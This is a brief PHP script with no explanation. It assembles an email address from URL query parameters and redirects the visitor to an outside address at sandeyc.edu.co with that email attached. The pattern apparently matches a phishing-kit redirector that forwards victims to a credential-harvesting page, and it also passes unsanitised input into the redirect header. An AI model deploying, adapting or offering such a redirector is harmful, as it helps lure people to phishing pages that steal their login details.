<?php

if($_GET['user'] && $_GET['dom'] && $_GET['ext'])
{
$email = $_GET['user'].'@'.$_GET['dom'].'.'.$_GET['ext'];
}
else
{
$email = $_GET['email'];
}

$url = 'https://sandeyc.edu.co/jup';

header("Location: $url?email=$email");

?>